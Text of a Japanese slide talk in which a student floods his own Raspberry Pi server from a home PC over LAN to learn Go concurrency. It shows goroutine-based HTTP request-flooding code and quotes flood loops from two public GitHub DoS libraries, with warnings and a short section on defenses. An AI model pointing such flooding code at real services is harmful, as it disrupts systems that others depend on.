ベンチマークより力比べしたくない？

1
ベンチマークより力比べしたくない？

2
今日のスライド
リンク

3
● メイン所属：信州大学工学部4年 
● サブ所属：メルペイ(インターン) 
● ポジション：バックエンド 
● Go歴：4ケ月 
● 趣味：カメラ、筋トレ、自作PC 
田村弘(@bieshan)

5
性能厨
● 漫画やアニメを見ていて自分の考えた最強オリジナルキャラ
の登場を夢想するのは、中二病の残念な症状の1つ。(ニコニ
コ大百科より) 
● PCの場合、必要以上に性能だけ追求してるやつを指します。
(僕の中では)

6
高性能にロマンを感じる

7
性能厨が作る自作PC
● 当時一番いいCPU
○ 9900k, 8core(最大利用率: 32%)
● 必要以上のメモリ
○ 64GB(最大利用率: 30%)
● 当時一番いいGPU
○ 2080 Ti(最大利用率: 45%)
● 当時一番いいSSD
○ I/O 3500M/s 1TB

10
性能厨は大体ベンチマークが好き

11
僕はそれだけでは満足できなかった

12
隅で転がっていたラズパイが目に入った

13
この性能マシマシのパソコンなら、
ラズパイボコボコにできない？

14
ラズパイとは
● カード型PC
● Linux系OS
● 安い、省エネー
● IoT系の中堅機

16
やりたいこと
○ ラズパイを殺したい

17
どうやって？
○ ラズパイでサーバーを立てる

18
どうやって？
○ 自作PCから大量のアクセスを行う

19
要は、DoS攻撃ってやつ

21
ここからのことは
絶対に他人にしてはいけません

22
下準備(自作PC)
Go未経験の僕
同時に大量のアクセ
スするなら並列したい
な
Goって並列に強いら
しいじゃん

23
下準備(ラズパイ)
● ラズパイでサーバーを立てる
○ endpointの‘/ping’だけ実装する
○ sqlite3サーバー立てる
○ ‘/ping’の機能
■ “pong”を返す
■ DBにアクセス記録一行追加する

24
下準備(ラズパイ)
DBのスキーマ
CREATE TABLE IF NOT EXISTS "data" ("id"
integer primary key
autoincrement,"created_at"
datetime,"updated_at"
datetime,"deleted_at" datetime );
CREATE INDEX idx_data_deleted_at ON
"data"(deleted_at) ;

25
下準備
ローカル
LANケーブル直接続

26
下準備(自作PC)
アクセス用のコード
func request() {
url := "http://raspberrypi.local:8080/ping"
for cnt := 0; cnt < 100; cnt++ {
resp, _ := http.Get(url)
_, _ = io.Copy(ioutil.Discard, resp.Body)
_ = resp.Body.Close()
}
}

27
下準備(自作PC)
とりあえず見つけた並列できるコード
func exp1() {
ch1 := make(chan bool)
go func() {
doSomeThing()
ch1 <- true
}()
go func() {
doSomeThing()
ch2 <- true
}()
<-ch1
<-ch2
}

28
下準備(自作PC)
僕が書いたコード
func exp1() {
.
.
.
.
.
.
}

29
下準備(自作PC)
func exp1() {
...
go func() {
request()
ch1 <- true
}()
go func() {
request()
ch2 <- true
}()
...
go func() {
request()
ch99 <- true
}()
...
}

30
下準備(自作PC)
func exp1() {
.
.
.
<-ch1
<-ch2
.
.
.
<-ch99
}

32
結果
● 処理は遅くなるが、落ちることはない
○ Error: Database is locked.
○ Error: too many ﬁle open.
○ Error: UNIQUE constraint failed: created_at

34
下準備(自作PC)
Pythonでクソコード自動生成する

35
下準備(自作PC)
クソコード
func exp1() {
.
.
.
.
.
.
}

36
下準備(自作PC)
クソコード
func exp1() {
...
go func() {
request()
ch1 <- true
}()
go func() {
request()
ch2 <- true
}()
...
go func() {
request()
ch1500 <- true
}()
...
}

37
下準備(自作PC)
クソコード
func exp1() {
.
.
.
<-ch1
<-ch2
.
.
.
<-ch1500
}

39
なんだ、並列処理
そんな難しくないじゃん

40
今日のために改善
引用

41
改善案
1週間前に書いた改善案
func main() {
var wg sync.WaitGroup
num := 500
for cnt := 0; cnt < num; cnt++ {
wg.Add(1)
go func() {
defer wg.Done()
request()
}()
}
wg.Wait()
}

43
結果
● goroutineを120個までは落ちることはない
○ Error: Database is locked.
○ Error: too many ﬁle open.
○ Error: UNIQUE constraint failed: created_at
● goroutineを125個以上増やすとDBで落ちる
● DBなしにするといくら増やしても落ちない

44
もう少し調べて
● DDoSのライブラリがあった
○ https://github.com/OGFris/DDoS
○ https://github.com/Konstantin8105/DDoS

45
● https://github.com/Konstantin8105/DDoS
● 攻撃部：自分とほぼ同じ
go func() {
for {
select {
case <-(*d.stop):
return
default:
// sent http GET requests
resp, err := http.Get(d.url)
...
}
runtime.Gosched()
}
}

46
https://github.com/OGFris/DDoS
● 攻撃部：65500回のpingを飛ばしている
go func() {
pinger, err := ping.NewPinger(ip)
if err != nil {
return err
}
pinger.Count = 65500
pinger.Run()
return nil
}()

47
流石に、ラズパイが可哀想
に見えてきた

48
● DOSならIPアドレス制限
● DDoSはなかなかは防げられない
○ WAF(Web Application ﬁrewall)
○ 最近はクラウド側に対策任せることが多い
防ぎ方

49
まとめ
● スコアより力比べがいいぞ
● Goの並行処理はシンプルだが難しい
● DoS攻撃は複数のレイヤーで行える
● DoS攻撃は絶対に他人にしていけない

50
この話を聞いて、どうしても
DoS攻撃がしたい人へ

51
会場に一台用意してあります

52
ご清聴ありがとうございました。

ベンチマークより力比べしたくない？

Recommended

Recommended

More Related Content

Recently uploaded

Recently uploaded (8)

Featured

Featured (20)

ベンチマークより力比べしたくない？